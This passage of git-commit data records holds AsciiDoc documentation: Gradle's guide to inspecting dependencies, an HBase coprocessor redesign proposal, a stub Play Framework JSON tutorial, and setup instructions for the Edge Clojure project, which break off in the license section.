link:https:\/\/en.wikipedia.org\/wiki\/Dependency_hell[dependency hell].\nUsers can render the full graph of dependencies as well as identify the selection reason and origin for a dependency.\nDependencies can originate through build script declared dependencies or transitive dependencies.\nYou can visualize dependencies with:\n\n- the built-in Gradle CLI `dependencies` task\n- the built-in Gradle CLI `dependencyInsight` task\n- link:https:\/\/scans.gradle.com\/[build scans]\n\n[[sec:listing_dependencies]]\n== List Project Dependencies\n\nGradle provides the built-in `dependencies` task to render a dependency tree from the command line.\nBy default, the dependency tree renders dependencies for all <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,configurations>> within a 
<<command_line_interface#executing_tasks_in_multi_project_builds,single project>>.\nThe dependency tree indicates the selected version of each dependency.\nIt also displays information about dependency conflict resolution.\n\nThe `dependencies` task can be especially helpful for issues related to transitive dependencies.\nYour build file lists direct dependencies, but the `dependencies` task can help you understand which transitive dependencies resolve during your build.\n\n=== Output Annotations\n\nThe `dependencies` task marks dependency trees with the following annotations:\n\n- `(*)`: Indicates repeated occurrences of a transitive dependency subtree. Gradle expands transitive dependency subtrees only once per project; repeat occurrences only display the root of the subtree, followed by this annotation.\n- `(c)`: This element is a <<dependency_constraints.adoc#sec:direct-vs-transitive-deps,dependency constraint>>, not a dependency. Look for the matching dependency elsewhere in the tree.\n- `(n)`: A dependency or dependency configuration that <<declaring_dependencies.adoc#sec:resolvable-consumable-configs,cannot be resolved>>.\n\n=== Specify a Dependency Configuration\n\nTo focus on the information about one dependency configuration, provide the optional parameter `--configuration`.\nJust like <<command_line_interface#sec:name_abbreviation, project and task names>>, Gradle accepts abbreviated names to select a dependency configuration.\nFor example, you can specify `tRC` instead of `testRuntimeClasspath` if the pattern matches to a single dependency configuration.\nBoth of the following examples show dependencies in the `testRuntimeClasspath` dependency configuration of a Java project:\n\n----\n> gradle -q dependencies --configuration testRuntimeClasspath\n----\n\n----\n> gradle -q dependencies --configuration tRC\n----\n\nTo see a list of all the configurations available in a project, including those added by any plugins, you can run a `resolvableConfigurations` report.\n\nFor more info, see that plugin's documentation (for instance, the Java Plugin is documented <<java_plugin.adoc#sec:java_plugin_and_dependency_management,here>>).\n\n=== Example\n\nConsider a project that uses the link:https:\/\/www.eclipse.org\/jgit\/[JGit library] to execute Source Control Management (SCM) operations for a release process.\nYou can declare dependencies for external tooling with the help of a <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,custom dependency configuration>>.\nThis avoids polluting other contexts, such as the compilation classpath for your production source code.\n\nThe following example declares a custom dependency configuration named \"scm\" that contains the JGit dependency:\n\n====\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependenciesReport\/groovy\",files=\"build.gradle[tags=dependency-declaration]\"]\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependenciesReport\/kotlin\",files=\"build.gradle.kts[tags=dependency-declaration]\"]\n====\n\n\nUse the following command to view a dependency tree for the `scm` dependency configuration:\n\n----\n> gradle -q dependencies --configuration scm\ninclude::{snippetsPath}\/dependencyManagement\/inspectingDependencies-dependenciesReport\/tests\/dependencyReport.out[]\n----\n\n[[sec:identifying_reason_dependency_selection]]\n== Identify the Dependency Version Selected\n\nA project may request two different versions of the same dependency either directly or 
transitively.\nGradle applies <<dependency_resolution.adoc#sec:version-conflict,version conflict resolution>> to ensure that only one version of the dependency exists in the dependency graph.\nThe following example introduces a conflict with `commons-codec:commons-codec`, added both as a direct dependency and a transitive dependency of JGit:\n\n====\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/groovy\",files=\"build.gradle[tags=dependency-declaration]\"]\ninclude::sample[dir=\"snippets\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/kotlin\",files=\"build.gradle.kts[tags=dependency-declaration]\"]\n====\n\nThe dependency tree in a link:https:\/\/scans.gradle.com\/[build scan] shows information about conflicts.\nClick on a dependency and select the \"Required By\" tab to see the selection reason and origin of the dependency.\n\nimage::dependency-management-dependency-insight-report-build-scan.png[]\n\n=== Dependency Insights\n\nGradle provides the built-in `dependencyInsight` task to render a _dependency insight report_ from the command line.\nDependency insights provide information about a single dependency within a single <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,configuration>>.\nGiven a dependency, you can identify the selection reason and origin.\n\n`dependencyInsight` accepts the following parameters:\n\n`--dependency <dependency>` (mandatory)::\nThe dependency to investigate.\nYou can supply a complete `group:name`, or part of it.\nIf multiple dependencies match, Gradle generates a report covering all matching dependencies.\n`--configuration <name>` (mandatory)::\nThe dependency configuration which resolves the given dependency.\nThis parameter is optional for projects that use the <<java_plugin#java_plugin, Java plugin>>, since the plugin provides a default value of `compileClasspath`.\n`--single-path` (optional)::\nRender only a single path to the dependency.\n\nThe following code snippet demonstrates how to run a dependency insight report for all paths to a dependency named \"commons-codec\" within the \"scm\" configuration:\n\n----\n> gradle -q dependencyInsight --dependency commons-codec --configuration scm\ninclude::{snippetsPath}\/dependencyManagement\/inspectingDependencies-dependencyInsightReport\/tests\/dependencyInsightReport.out[]\n----\n\nFor more information about configurations, see the <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configuration documentation>>.\n\n==== Selection Reasons\n\nThe \"Selection reasons\" section of the dependency insight report lists the reasons why a dependency was selected.\nHave a look at the table below to understand the meaning of the different terms used:\n\n.Terminology\n[%header%autowidth,compact]\n|===\n| Reason | Meaning\n\n| (Absent)\n| No reason other than a reference, direct or transitive, was present.\n\n| Was requested : <text>\n| The dependency appears in the graph, and the inclusion came with a <<declaring_dependencies#sec:documenting-dependencies, `because` text>>.\n\n| Was requested : didn't match versions <versions>\n| The dependency appears with a <<dynamic_versions#sub:declaring_dependency_with_dynamic_version, dynamic version>> which did not include the listed versions.\nMay be followed by a `because` text.\n\n| Was requested : reject version <versions>\n| The dependency appears with a <<rich_versions#rich-version-constraints, rich version>> containing one or more `reject`.\nMay 
be followed by a `because` text.\n\n| By conflict resolution : between versions <version>\n| The dependency appeared multiple times, with different version requests.\nThis resulted in <<dependency_resolution#sec:version-conflict, conflict resolution>> to select the most appropriate version.\n\n| By constraint\n| A <<dependency_constraints#sec:adding-constraints-transitive-deps, dependency constraint>> participated in the version selection.\nMay be followed by a `because` text.\n\n| By ancestor\n| There is a <<rich_versions#rich-version-constraints, rich version>> with a `strictly` which enforces the version of this dependency.\n\n| Selected by rule\n| A <<resolution_rules#resolution_rules, dependency resolution rule>> overruled the default selection process.\nMay be followed by a `because` text.\n\n| Rejection : <version> by rule because <text>\n| A `ComponentSelection.reject` link:{groovyDslPath}\/org.gradle.api.artifacts.ComponentSelection.html#org.gradle.api.artifacts.ComponentSelection:reject(java.lang.String)[rejected the given version] of the dependency.\n\n| Rejection: version <version>: <attributes information>\n| The dependency has a dynamic version and some versions did not match the <<variant_model#sec:variant-aware-matching, requested attributes>>.\n\n| Forced\n| The build <<dependency_downgrade_and_exclude#forced_dependencies_vs_strict_dependencies, enforces>> the version of the dependency.\n|===\n\nIf multiple selection reasons exist, the insight report lists all of them.\n\n== Troubleshooting\n\n[[sec:resolving-version-conflict]]\n=== Version Conflicts\n\nIf the selected version does not match your expectation, Gradle offers a series of tools to help you <<dependency_constraints.adoc#dependency-constraints,control transitive dependencies>>.\n\n[[sec:resolving-variant-aware-errors]]\n=== Variant Selection Errors\n\nSometimes a selection error happens at the <<variant_model.adoc#understanding-variant-selection,variant selection level>>.\nHave a look at the <<variant_model.adoc#sec:variant-select-errors,dedicated section>> to understand these errors and how to resolve them.\n\n[[sub:resolving-unsafe-configuration-resolution-errors]]\n=== Unsafe Configuration Resolution Errors\n\nResolving a configuration can have side effects on Gradle's project model.\nAs a result, Gradle must manage access to each project's configurations.\nThere are a number of ways a configuration might be resolved unsafely.\nFor example:\n\n* A task from one project directly resolves a configuration in another project in the task's action.\n* A task specifies a configuration from another project as an input file collection.\n* A build script for one project resolves a configuration in another project during evaluation.\n* Project configurations are resolved in the settings file.\n\nGradle produces a deprecation warning for each unsafe access.\nUnsafe access can cause indeterminate errors.\nYou should <<command_line_interface.adoc#sec:command_line_warnings,fix unsafe access warnings>> in your build.\n\nIn most cases, you can resolve unsafe accesses by creating a cross-project dependency on the other project.\nSee the documentation for <<cross_project_publications.adoc#cross_project_publications, sharing outputs between projects>> for more information.\n\nIf you find a use case that can't be resolved using these techniques, please let us know by filing a https:\/\/github.com\/gradle\/gradle\/issues[GitHub Issue].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} 
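The preceding Gradle record's `scm` example pulls its build-script listing in via `include::sample[...]` snippets that are not reproduced in this dump. As a rough sketch only, assuming Maven Central as the repository and an illustrative (not verified) JGit version, such a declaration might look like this in the Groovy DSL:

[source,groovy]
----
// Minimal sketch of a custom "scm" configuration. The configuration name
// matches the example above; the repository and version are assumptions.
configurations {
    scm
}

repositories {
    mavenCentral()
}

dependencies {
    // org.eclipse.jgit:org.eclipse.jgit is JGit's published coordinate;
    // the version string here is illustrative only.
    scm 'org.eclipse.jgit:org.eclipse.jgit:4.9.2.201712150930-r'
}
----

Against such a build script, `gradle -q dependencies --configuration scm` would render only the JGit subtree, leaving `compileClasspath` and other contexts untouched.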
{"commit":"1e0d9095325774d8fab4982ede911356f3b9907f","subject":"HBASE-17730 Add license header to design doc.","message":"HBASE-17730 Add license header to design doc.\n","repos":"HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase,HubSpot\/hbase","old_file":"dev-support\/design-docs\/Coprocessor_Design_Improvements-Use_composition_instead_of_inheritance-HBASE-17732.adoc","new_file":"dev-support\/design-docs\/Coprocessor_Design_Improvements-Use_composition_instead_of_inheritance-HBASE-17732.adoc","new_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n= Coprocessor Design Improvements (link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-17732[HBASE-17732])\n\nAuthor: Apekshit Sharma\n\n== Introduction\n\nThis doc explains current design of Coprocessor feature in brief, few issues I noticed, and\nsuggestions on how to fix them & further improve overall design.\n\n*TL;DR* +\nWe are moving from\n\n* Observer *is* Coprocessor\n* FooService *is* CoprocessorService\n\nTo\n\n* Coprocessor *has* Observer\n* Coprocessor *has* Service\n\nSee code example in <<main.design.change.suggestions>>.\n\n== Terminology\n\nhooks = functions in observers. Named because third-party use these functions to \u201chook up\u201d custom\nlogic to internal code paths.\n\n[[background]]\n== Background\n\nCoprocessors are well link:http:\/\/hbase.apache.org\/book.html#cp[documented in the refguide].\n\nHere we give a little background information on involved classes, their responsibilities, and\nrelationship to each other.\n\n* Main classes\n** Coprocessor (interface)\n*** All *Observer* interfaces derive from Coprocessor interface.\n**** Coprocessor Interface is a _Marker _Interface. It just has start\/stop methods and enums for\nstages in the Coprocessor Lifecycle.\n** http:\/\/hbase.apache.org\/book.html#_observer_coprocessors[Observers] (interface)\n*** Contain hooks which third-party programs can override to inject functionality in various\ninternal code paths. For e.g preCreateTable(...) 
will be called just before any table is created.\n*** Current set of observers: _MasterObserver, RegionObserver, RegionServerObserver, WALObserver,\nEndpointObserver, BulkLoadObserver._\n** CoprocessorEnvironment (interface)\n*** Encapsulates a coprocessor instance and other information like versions, priority, etc.\n*** Coprocessor implementations use it to get access to tables.\n*** Four main implementations: _MasterEnvironment, RegionEnvironment, RegionServerEnvironment,\nWALEnvironment._\n** CoprocessorHost (abstract class)\n*** Responsible for loading coprocessors\n*** Four concrete sub-classes: MasterCoprocessorHost, RegionCoprocessorHost,\nRegionServerCoprocessorHost, WALCoprocessorHost\n*** Each host is tied to corresponding environment type using template argument \u2018E\u2019.\n\n== Problems\n\n* CoprocessorEnvironment has `Coprocessor getInstance()`. Since Observer types which can be\nhandled by an environment are not statically tied to it, coprocessor hosts (which are statically\ntied to Environment) don\u2019t know which kind of coprocessors are relevant to them, i.e.\nMasterCoprocessorHost is tied to MasterEnvironment, but it doesn\u2019t know that it can only handle\nMasterObserver(s). As a result:\n** Problem 1: All hosts load all observers i.e. MasterCoprocessorHost will also load RegionObserver\nand other observers.\n** Problem 2: Hosts use runtime checks likes `observer instanceOf ExpectedObserver` in\nexecOperation and other functions to filter out incompatible observers.\n** Problem 3: Many redundant functions in every implementation of coprocessor host.\n* Observer *extends* Coprocessor (inheritance)\n** Problem 4: Any third-party coprocessor which wants to use many observers will have to extend all\nof them in same class. For eg.\nclass AccessController implements MasterObserver,\n RegionObserver, RegionServerObserver, EndpointObserver,\n BulkLoadObserver, AccessControlService.Interface,\n CoprocessorService\nThat results in big classes with 100+ functions.\n\n== Proposed Solutions\n\n* There are 6 types of observers (listed in <<background>> section above), but just 4 types of\nCoprocessorEnvironment. So some XEnvironment has to be handling multiple Observers\n(RegionEnvironment serves RegionObserver, EndpointObserver and BulkLoadObservers). Our aim is to\nstatically tie environment to types of observers it can serve. There are two alternative choices\nhere:\n** Option 1: Limit to 4 types of Observers. That fits nicely in our pattern-of-4\n(4 hosts, 4 environments, 4 observers) and will make the overall design simpler. Although it may\nlook simple at surface, it\u2019ll actually lead to a single large observer interface which will only\ngrow and may contain 100s of hooks in future (master already has 100+)\n** Option 2: Use multiple observers to group together similar kinds of hooks.\nLike we have RegionObserver, EndpointObserver and BulkLoadObserver; we can have ScannerObserver,\nAMObserver, etc instead of single MasterObserver. Benefits being\n*** Proper encapsulation of related hooks and separation from unrelated hooks\n*** We can give different Stability guarantees for different set of hooks. 
Something which\u2019ll make\nour CP compat management much easier.\n\nI believe Option 2 to be better than Option 1, and the design changes suggested later are based on\nOption 2.\n\n* For problem 4, we should replace inheritance with composition, so developers have choice to\nbreak out observer implementations into separate classes.\n\n[[main.design.change.suggestions]]\n== Main Design Change suggestions\n\n* Extend pattern-of-4 up to coprocessor.\n+\nCoprocessorHost \u2192 Env \u2192 Coprocessor\n* Tie each CoprocessorEnvironment to corresponding Coprocessor\n* Use composition instead of inheritance between Coprocessor and Observers.\n\n=== Current design\n\nOnly changing parts are mentioned here. Anything not changing is represented by \u201c...\u201d\n\n[source,java]\n----\ninterface Coprocessor {\n ...\n}\n\ninterface CoprocessorEnvironment {\n Coprocessor getInstance();\n ...\n}\n\ninterface CoprocessorService {\n Service getService();\n}\n\nabstract class CoprocessorHost<E extends CoprocessorEnvironment> {\n ...\n}\n\ninterface RegionObserver extends Coprocessor {\n ...\n}\n\ninterface BulkLoadObserver extends Coprocessor {\n ...\n}\n\ninterface EndpointObserver extends Coprocessor {\n ...\n}\n----\n\n=== New design\n\n[source,java]\n----\ninterface Coprocessor {\n ...\n}\n\n\/\/ Extend pattern-of-4 to coprocessors.\ninterface RegionCoprocessor extends Coprocessor {\n RegionObserver getRegionObserver();\n BulkLoadObserver getBulkLoadObserver();\n EndpointObserver getEndpointObserver();\n Service getService();\n}\n\n\/\/ Tie coprocessor to environment\ninterface CoprocessorEnvironment<C extends Coprocessor> {\n C getInstance();\n ...\n}\n\nabstract class CoprocessorHost<C extends Coprocessor, E extends CoprocessorEnvironment<C>> {\n ...\n}\n\n\/\/ Doesn\u2019t extend coprocessor\ninterface RegionObserver extends Coprocessor {\n \u2026\n}\n\n\/\/ Doesn\u2019t extend coprocessor\ninterface BulkLoadObserver extends Coprocessor {\n \u2026\n}\n----\n\n\n== How does it fix our issues?\n\n* Fix #1: CoprocessorHost is now tied to types of coprocessors it can serve by template argument C.\nDuring load time, it can ignore any coprocessors which don\u2019t match.\n* Fix #2 and #3: Pull the duplicate functions into CoprocessorHost class. Individual host subclasses\ncan use these directly. One interesting part here is ObserverGetter<C, O>. For any specific hook,\nsay in observer O, subclasses specify ObserverGetter<C, O> so that the shared methods can extract\nobserver O from coprocessor C.\n* Fix #4: Choosing composition over inheritance, by adding getter functions in coprocessors (e.g.\ngetRegionObserver()), implementations can now break up observer implementations into separate\nclasses. For e.g. our AccessController will now just be:\n`class AccessController implements AccessControlService.Interface, CoprocessorService`\n\n[[migrating.existing.cps.to.new.design]]\n== Migrating existing CPs to new design\n\nThere\u2019s a simple and small fix that can migrate existing coprocessors to the new design. +\nIf we had the following observer in the old design: +\n----\nclass FooObserver implements RegionObserver {\n...\n...\n}\n----\n\nIt can be \u201cmade to work\u201d with the new design like this: +\n----\nclass FooObserver implements RegionCoprocessor, RegionObserver {\n public RegionObserver getRegionObserver() { return this; }\n ...\n ...\n}\n----\n\nHowever, note that this is only a workaround to quickly migrate ~100 CPs in our code base to new\ndesign without creating new classes and files. 
*New CPs should NOT follow this pattern.*\n\n== Additional Benefit\n\n* Cleaner solution to https:\/\/issues.apache.org\/jira\/browse\/HBASE-17106[HBASE-17106].\n* We can have multiple observer interfaces for each environment now. For e.g. we can break our single\n monolithic MasterObserver (~150 functions) into multiple observer interfaces - ScannerObserver,\n AMObserver, etc.\n* These observers can be assigned different compatibility guarantees. For instance, new hooks by\nthe Backup feature could have been put into a separate Observer and marked IS.Unstable, while features\nwhich have hardened over the years can be marked IS.Stable.\n* Only the coprocessors corresponding to hosts which support endpoint service will have\na \u201cgetService()\u201d method. So WALCoprocessor, which cannot support a service, doesn\u2019t have one. That may\nlook like a minor thing. But if our design can cleanly convey what is and isn\u2019t supported, that\u2019s beautiful\nand powerful and helpful for downstream developers.\n\n\n","old_contents":"= Coprocessor Design Improvements (link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-17732[HBASE-17732])\n\nAuthor: Apekshit Sharma\n\n== Introduction\n\nThis doc explains the current design of the Coprocessor feature in brief, a few issues I noticed, and\nsuggestions on how to fix them & further improve the overall design.\n\n*TL;DR* +\nWe are moving from\n\n* Observer *is* Coprocessor\n* FooService *is* CoprocessorService\n\nTo\n\n* Coprocessor *has* Observer\n* Coprocessor *has* Service\n\nSee code example in <<main.design.change.suggestions>>.\n\n== Terminology\n\nhooks = functions in observers. Named because third-party programs use these functions to \u201chook up\u201d custom\nlogic to internal code paths.\n\n[[background]]\n== Background\n\nCoprocessors are well link:http:\/\/hbase.apache.org\/book.html#cp[documented in the refguide].\n\nHere we give a little background information on involved classes, their responsibilities, and\nrelationship to each other.\n\n* Main classes\n** Coprocessor (interface)\n*** All *Observer* interfaces derive from Coprocessor interface.\n**** Coprocessor Interface is a _Marker_ Interface. It just has start\/stop methods and enums for\nstages in the Coprocessor Lifecycle.\n** http:\/\/hbase.apache.org\/book.html#_observer_coprocessors[Observers] (interface)\n*** Contain hooks which third-party programs can override to inject functionality in various\ninternal code paths. For e.g. preCreateTable(...) will be called just before any table is created.\n*** Current set of observers: _MasterObserver, RegionObserver, RegionServerObserver, WALObserver,\nEndpointObserver, BulkLoadObserver._\n** CoprocessorEnvironment (interface)\n*** Encapsulates a coprocessor instance and other information like versions, priority, etc.\n*** Coprocessor implementations use it to get access to tables.\n*** Four main implementations: _MasterEnvironment, RegionEnvironment, RegionServerEnvironment,\nWALEnvironment._\n** CoprocessorHost (abstract class)\n*** Responsible for loading coprocessors\n*** Four concrete sub-classes: MasterCoprocessorHost, RegionCoprocessorHost,\nRegionServerCoprocessorHost, WALCoprocessorHost\n*** Each host is tied to corresponding environment type using template argument \u2018E\u2019.\n\n== Problems\n\n* CoprocessorEnvironment has `Coprocessor getInstance()`.
Since Observer types which can be\nhandled by an environment are not statically tied to it, coprocessor hosts (which are statically\ntied to Environment) don\u2019t know which kind of coprocessors are relevant to them, i.e.\nMasterCoprocessorHost is tied to MasterEnvironment, but it doesn\u2019t know that it can only handle\nMasterObserver(s). As a result:\n** Problem 1: All hosts load all observers i.e. MasterCoprocessorHost will also load RegionObserver\nand other observers.\n** Problem 2: Hosts use runtime checks likes `observer instanceOf ExpectedObserver` in\nexecOperation and other functions to filter out incompatible observers.\n** Problem 3: Many redundant functions in every implementation of coprocessor host.\n* Observer *extends* Coprocessor (inheritance)\n** Problem 4: Any third-party coprocessor which wants to use many observers will have to extend all\nof them in same class. For eg.\nclass AccessController implements MasterObserver,\n RegionObserver, RegionServerObserver, EndpointObserver,\n BulkLoadObserver, AccessControlService.Interface,\n CoprocessorService\nThat results in big classes with 100+ functions.\n\n== Proposed Solutions\n\n* There are 6 types of observers (listed in <<background>> section above), but just 4 types of\nCoprocessorEnvironment. So some XEnvironment has to be handling multiple Observers\n(RegionEnvironment serves RegionObserver, EndpointObserver and BulkLoadObservers). Our aim is to\nstatically tie environment to types of observers it can serve. There are two alternative choices\nhere:\n** Option 1: Limit to 4 types of Observers. That fits nicely in our pattern-of-4\n(4 hosts, 4 environments, 4 observers) and will make the overall design simpler. Although it may\nlook simple at surface, it\u2019ll actually lead to a single large observer interface which will only\ngrow and may contain 100s of hooks in future (master already has 100+)\n** Option 2: Use multiple observers to group together similar kinds of hooks.\nLike we have RegionObserver, EndpointObserver and BulkLoadObserver; we can have ScannerObserver,\nAMObserver, etc instead of single MasterObserver. Benefits being\n*** Proper encapsulation of related hooks and separation from unrelated hooks\n*** We can give different Stability guarantees for different set of hooks. Something which\u2019ll make\nour CP compat management much easier.\n\nI believe Option 2 to be better than Option 1, and the design changes suggested later are based on\nOption 2.\n\n* For problem 4, we should replace inheritance with composition, so developers have choice to\nbreak out observer implementations into separate classes.\n\n[[main.design.change.suggestions]]\n== Main Design Change suggestions\n\n* Extend pattern-of-4 up to coprocessor.\n+\nCoprocessorHost \u2192 Env \u2192 Coprocessor\n* Tie each CoprocessorEnvironment to corresponding Coprocessor\n* Use composition instead of inheritance between Coprocessor and Observers.\n\n=== Current design\n\nOnly changing parts are mentioned here. 
Anything not changing is represented by \u201c...\u201d\n\n[source,java]\n----\ninterface Coprocessor {\n ...\n}\n\ninterface CoprocessorEnvironment {\n Coprocessor getInstance();\n ...\n}\n\ninterface CoprocessorService {\n Service getService();\n}\n\nabstract class CoprocessorHost<E extends CoprocessorEnvironment> {\n ...\n}\n\ninterface RegionObserver extends Coprocessor {\n ...\n}\n\ninterface BulkLoadObserver extends Coprocessor {\n ...\n}\n\ninterface EndpointObserver extends Coprocessor {\n ...\n}\n----\n\n=== New design\n\n[source,java]\n----\ninterface Coprocessor {\n ...\n}\n\n\/\/ Extend pattern-of-4 to coprocessors.\ninterface RegionCoprocessor extends Coprocessor {\n RegionObserver getRegionObserver();\n BulkLoadObserver getBulkLoadObserver();\n EndpointObserver getEndpointObserver();\n Service getService();\n}\n\n\/\/ Tie coprocessor to environment\ninterface CoprocessorEnvironment<C extends Coprocessor> {\n C getInstance();\n ...\n}\n\nabstract class CoprocessorHost<C extends Coprocessor, E extends CoprocessorEnvironment<C>> {\n ...\n}\n\n\/\/ Doesn\u2019t extend coprocessor\ninterface RegionObserver extends Coprocessor {\n \u2026\n}\n\n\/\/ Doesn\u2019t extend coprocessor\ninterface BulkLoadObserver extends Coprocessor {\n \u2026\n}\n----\n\n\n== How does it fix our issues?\n\n* Fix #1: CoprocessorHost is now tied to types of coprocessors it can serve by template argument C.\nDuring load time, it can ignore any coprocessors which don\u2019t match.\n* Fix #2 and #3: Pull the duplicate functions into CoprocessorHost class. Individual host subclasses\ncan use these directly. One interesting part here is ObserverGetter<C, O>. For any specific hook,\nsay in observer O, subclasses specify ObserverGetter<C, O> so that the shared methods can extract\nobserver O from coprocessor C.\n* Fix #4: Choosing composition over inheritance, by adding getter functions in coprocessors (e.g.\ngetRegionObserver()), implementations can now break up observer implementations into separate\nclasses. For e.g. our AccessController will now just be:\n`class AccessController implements AccessControlService.Interface, CoprocessorService`\n\n[[migrating.existing.cps.to.new.design]]\n== Migrating existing CPs to new design\n\nThere\u2019s a simple and small fix that can migrate existing coprocessors to the new design. +\nIf we had the following observer in the old design: +\n----\nclass FooObserver implements RegionObserver {\n...\n...\n}\n----\n\nIt can be \u201cmade to work\u201d with the new design like this: +\n----\nclass FooObserver implements RegionCoprocessor, RegionObserver {\n public RegionObserver getRegionObserver() { return this; }\n ...\n ...\n}\n----\n\nHowever, note that this is only a workaround to quickly migrate ~100 CPs in our code base to new\ndesign without creating new classes and files. *New CPs should NOT follow this pattern.*\n\n== Additional Benefit\n\n* Cleaner solution to https:\/\/issues.apache.org\/jira\/browse\/HBASE-17106[HBASE-17106].\n* We can have multiple observer interfaces for each environment now. For e.g We can break our single\n monolithic MasterObsever (~150 functions) to multiple observer interfaces - ScannerObserver,\n AMObserver, etc.\n* These observers can be assigned different compatibility guarantees. 
For instances, new hooks by\nBackup feature could have been put into separate Observer and marked IS.Unstable, while features\nwhich have hardened over years can be marked IS.Stable.\n* Only the coprocessors corresponding to hosts which support endpoint service will have\n\u201cgetService()\u201d method. So WALCoprocessor which cannot support service doesn\u2019t have one. That may\nlook minor thing. But if our design can cleanly convey what is and isn\u2019t supported, that\u2019s beautiful\nand powerful and helpful for downstream developers.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11937736382f5d450eb371eadcd8fe029268b5d6","subject":"Update 2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","message":"Update 2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_file":"_posts\/2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_contents":"# Play Framework - Beginner Tutorial : How to handle a big json file in play ( more than 22 root variables)\n\n:published_at: 2016-08-15\n:hp-tags: play\n\nIt is not a good practice to have such a big json with many root variables. Nevertheless, we might need to call a rest api that will give a json like this\n\n```\n{ \"a1\": ..., \"a2\" : ..., \"a3\" : ..., \"a4\" : ..., \"a5\" : ..., \"a6\" : ..., \"a7\" : ..., \"a8\" : ..., \"a9\" : ..., \"a10\" : ..., \"a11\" : ..., \"a12\" : ..., \"a13\" : ..., \"a14\" : ..., \"a15\" : ..., \"a16\" : ..., \"a17\" : ..., \"a18\" : ..., \"a19\" : ..., \"a20\" : ..., \"a21\": ..., \"a22\" : ..., \"a23\" : ..., \"a24\" : ..., ....}\n\n\n\n","old_contents":"# Play Framework - Beginner Tutorial : How to handle a big json file in play ( more than 22 root variables)\n\n:published_at: 2016-08-15\n:hp-tags: play\n\nIt is not a good practice to have such a big json with many root variables. Nevertheless, we might need to call a rest api that will give a json like this\n\n'''\n{ \"a1\": ..., \"a2\" : ..., \"a3\" : ..., \"a4\" : ..., \"a5\" : ..., \"a6\" : ..., \"a7\" : ..., \"a8\" : ..., \"a9\" : ..., \"a10\" : ..., \"a11\" : ..., \"a12\" : ..., \"a13\" : ..., \"a14\" : ..., \"a15\" : ..., \"a16\" : ..., \"a17\" : ..., \"a18\" : ..., \"a19\" : ..., \"a20\" : ..., \"a21\": ..., \"a22\" : ..., \"a23\" : ..., \"a24\" : ..., ....}\n\n'''\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"25e0acda0103b5134b0dad4303cabaf320472ef9","subject":"Add documentation for cloning in setup","message":"Add documentation for cloning in setup\n","repos":"juxt\/edge,juxt\/edge","old_file":"doc\/resources\/doc\/sources\/setup.adoc","new_file":"doc\/resources\/doc\/sources\/setup.adoc","new_contents":"= How to build your own project upon Edge\n\nEdge is designed to be built upon.\nYou are free to make whatever changes you like (additions and deletions), in accordance with the <<_license>> (MIT).\n\n== Create a repository\n\nIf you don't have a remote repository already (e.g. 
on GitHub), here's how to create a new local one:\n\n[source,shell]\n----\nsrc$ mkdir acme\nsrc$ cd acme\nacme$ git init\n----\n\nIf you already have a repository, you can clone it like so:\n\n[source,shell]\n----\nsrc$ git clone git@github.com:acme\/acme.git\nsrc$ cd acme\n----\n\n== Add Edge to your project\n\nOnce you have your repository, you can add Edge as a remote, and incorporate it in:\n\n[source,shell]\n----\nacme$ git remote add edge https:\/\/github.com\/juxt\/edge.git\nacme$ git pull edge master\n----\n\n== Add a remote later (optional)\n\nIt's a good idea to have somewhere to back up your commits.\n\nFor example, if you create a new repository on GitHub called `acme` under the organisation `acme`, you could add the repository to your project like this:\n\n.Create a git remote\n[source,shell]\n----\nacme$ git remote add origin git@github.com:acme\/acme.git\nacme$ git push -u origin master\n----\n\n== Create a new app\n\nWith your new project created, you're ready to create an app.\nApps are deps.edn projects within Edge which are intended to be run as a server.\n\nFrom the root of the repo, run the `.\/bin\/app` script.\nIt can be run with optional flags which add support for Sass or ClojureScript; these are `--sass` and `--cljs` respectively.\n\n[NOTE]\n====\nYour project name should be namespaced to match your application.\nIf your company was named \"Acme\" you might use \"acme\/api\" or \"com.acme\/api\".\n\nIf you're unsure, use your company name at work, or your GitHub username for hobby projects.\nThere's a low chance of conflicts in an application.\n\nThe project namespace will determine the Clojure namespaces within your application.\n====\n\n[source,shell]\n----\nedge$ .\/bin\/app acme\/api\nedge$ .\/bin\/app acme\/blog --sass\nedge$ .\/bin\/app acme\/dashboard --cljs\nedge$ .\/bin\/app acme\/radar --sass --cljs\n----\n\n== Next steps\n\n<<dev-guide.adoc#,Learn Edge's development environment>>.\n\n== License\n\n----\nThe MIT License 